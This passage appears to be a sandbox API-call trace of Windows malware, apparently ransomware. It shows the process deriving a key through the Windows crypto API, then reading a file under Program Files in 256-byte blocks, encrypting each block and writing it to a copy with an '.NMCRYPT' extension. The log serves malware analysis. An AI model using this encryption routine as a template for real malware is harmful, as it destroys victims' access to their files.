CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.428] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.429] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0148.429] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.429] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad738) returned 1 [0148.429] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.429] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.429] wcslen (_String="\\\\?\\") returned 0x4 [0148.429] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad238) returned 1 [0148.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.429] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=111320) returned 1 [0148.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.430] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.477] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.477] GetLastError () returned 0x0 [0148.477] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.478] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.479] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.479] GetLastError () returned 0x0 [0148.479] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.479] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.479] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.479] GetLastError () returned 0x0 [0148.479] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.479] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.479] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.479] GetLastError () returned 0x0 [0148.479] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.479] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.479] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.479] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.480] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.480] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.480] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.480] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.480] GetLastError () returned 0x0 [0148.480] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.480] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.481] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.481] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.481] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.481] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.481] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.481] GetLastError () returned 0x0 [0148.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.482] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.482] GetLastError () returned 0x0 [0148.482] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.482] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 